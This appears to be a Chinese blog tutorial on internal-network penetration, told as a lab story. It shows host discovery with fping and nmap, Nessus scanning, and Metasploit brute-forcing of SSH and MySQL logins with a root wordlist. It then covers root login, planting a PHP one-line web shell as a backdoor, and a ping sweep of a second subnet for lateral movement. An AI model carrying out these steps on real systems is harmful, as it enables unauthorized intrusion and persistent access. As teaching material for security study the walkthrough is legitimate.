内网渗透之信息收集
内网渗透之信息收集
这一次我们将对内网进行一下信息收集,收集的内容主要包括:
主机系统服务版本、IP地址、端口、服务及服务版本、可能存在的漏洞等
模拟场景:
有一天,k悄悄的连接到了c的交换机上(至于怎么实施的我也不知道),因为xxx事件,对c的内部比较xxx,所以这天k趁着夜色连上内网后开始了他渗透之旅。
k =》 kali,c 》 CentOS, w =》 Win
1、信息收集-存活主机
首先k将自己的网卡调成自动获取IP之后,等待一会开始查看被分配的IP地址
root@mtcx:~# ifconfig
可以看到当前的IP为192.168.12.53、掩码为255.255.255.0,所以k知道了当前网段为192.168.12.0/24的(应该是这样的讲的吧)
所以k想到了使用fping这个命令去探测当前网段下是否还有其他主机存在.(为什么不用ping,我不会写编程呀,又懒得的搜)
1-1、内网探测之fping工具
root@mtcx:~# fping -ag 192.168.12.0/24 >> demo.txt
#意思将扫描到的存活主机地址写入到当前目录下demo.txt文件里
等待扫描结束后,k查看了收集到的存活主机
root@mtcx:~# cat demo.txt
从得到的结果中可以知道,除了自身的.53的IP外还有一个.58的主机存活,emmm 那个.2的是网关
所以接下就以.58为突破口进入到内部(为什么还要进内部呢,哇,不可能一下就进到核心区的吧,那样敌方也太弱了吧)
1-2、小结
收集到一台存活的主机.58其他信息未知下步进行验证
2、信息收集-端口收集
k获取一台存活的主机IP.58后,开始向其端口出手了。
2-1、端口扫描-nmap神器
root@mtcx:~# nmap 192.168.12.58
#使用默认配置扫描主机,可能存在遗漏
通过简单的扫描后发现目标有4个端口是开放的,分别是
22端口的ssh服务、80端口的http服务、111端口的rpcbind服务以及3306端口的mysql服务但是仅知道这些端口是不够的还不知道目标的系统版本什么、指纹信息等也是不知道的,所以又开始了新一轮扫描
root@mtcx:~# nmap -sV -p1-65535 -O 192.168.12.58
#这里的参数问题,-sV 版本 -p1-65535 端口 -O 指纹
通过扫描后发现目标更详细的信息
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 00:0C:29:5A:A7:89 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop好了,根据获取到的信息k已经知道了目标的系统为CentOS,可以进行ssh登陆,可以通过web访问、可以查询数据库,下面就是根据这些点查询相应的漏洞了。
注:或许你可能很疑惑为什么不进行其他的探测了,以为时间不允许呀。后面的事情还有很多,如果都弄完了,可能自己就没了(真正的从天黑到天亮再到~~),所以端口扫描就到这里先,想了解更多的可以查询下NMAP相关手册。
3、漏洞扫描-Nessus漏扫
在拿到这些信息以后为节省时间,k准备使用Nessus漏扫工具查看下其是否存在相应漏洞。(Nessus的安装问题请问下度娘)
打开早已准备好的Nessus界面。
注:如果出现打不开可能是服务停止了,手动开启下
添加一个新的扫描,选择高级扫描
添加详细信息
开始扫描
点击查看详情
在等待一会后扫描结束
点击查看
然后百度一波,emm,算了 还是再去找找吧
之后k来到了.58的80主页发现这是一个默认页,emm 找不到其他的信息呀。难道要御剑飞行!!算了再去看看别的。
4、启动MSF框架
即然是内网渗透怎么少的了MSF呢,去吧~
root@mtcx:~# msfdb run
由之前的信息收集可知,目标开启了22、80、111、3306端口,所以现在尝试弱口令登陆22端口试试。
4-1、ssh弱口令登陆
msf5 > search ssh_login
#搜索ssh登陆模块[object Object]
发现有两个模块可以用于登陆的,这里选择第一个。
msf5 > use auxiliary/scanner/ssh/ssh_login
查看下详细配置
msf5 auxiliary(scanner/ssh/ssh_login) > show options
这里对上面这三处位置进行设置
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.12.58
RHOSTS => 192.168.12.58
#设置目标IP
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /user/share/metasploitframework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
#设置字典
开始登陆
msf5 auxiliary(scanner/ssh/ssh_login) > run
#登陆
发现可以用root:root进行登陆,看样子好像权限还是比较高的那种,ssh登陆一下
5、进入到CentOS系统
新建一个窗口,使用ssh进行登陆(一般不要这样登陆哦)
root@mtcx:~# ssh root@192.168.12.58
#ssh登陆
查看当前所在IP是否为目标IP
[root@localhost ~]# ifconfig惊喜的发现这里还存在一个网段192.168.159.0/24的,当前主机的IP为.130(拿小本本先记一下)
6、新一轮的信息收集
开始查看当前目标中存在的用户
[root@localhost ~]# cd /home/
[root@localhost home]# ls
发现还存在一个mtcx的用户。(搞事情,搞事情)
以为当前用户为最高权限,所以可去很多地方的,所以接下来查看下mtcx中的信息
查看里面有没有数据
emmm,刚建的服务好像没啥东西  ̄へ ̄
对了,想起来之前在扫描时还存在一个开放的80端口,应该会有网站的存在,去看一眼。
7、发现网站
[root@localhost 下载]# cd /var/www/
cgi-bin/ html/
[root@localhost 下载]# cd /var/www/html/
authkey/ day/ readme/
[root@localhost 下载]# cd /var/www/html/authkey/
api/ caches/ html/ install/ phpcms/ phpsso_server/ statics/ uploadfile/
审计源码什么太累了,还是直接写一个一句话好了,方便下次进入
[root@localhost authkey]# vim cms.php
查看下文件所在
之后就是浏览器验证了,发现很OK
现在后门以后,找一下还有没有其他的点,好像还有一个mysql服务也是开的,试试去
回到msf上,搜索下MySQL的登陆模块(这里为什么又到这里呢,主要是介绍msf的用法,毕竟那边已经拿到最高权限了直接去都是可以的实现的)
msf5 auxiliary(scanner/ssh/ssh_login) > search mysql_login
使用模块
和之前ssh的配置基本一致
开始登陆
msf5 auxiliary(scanner/mysql/mysql_login) > run
和想象中不太一样欸,还是尝试下又没用弱口令
经过尝试,emmm 就去了
查看下数据库
。。。接下的事情就不说了,你懂的。
8、横向提权
探索其他主机
使用ping命令探索(超慢的)
for i in {1..254};do ping 192.168.159.$i -c1|grep time=|awk -F "[(): ]" '{print $4}';done
之后发现有一台存活的.132的主机
。。。
现在k面临一个问题如何去攻击.132的主机,因为不在一个网段无法利用自身已有的工具,有效的攻击。这该怎么办呢?
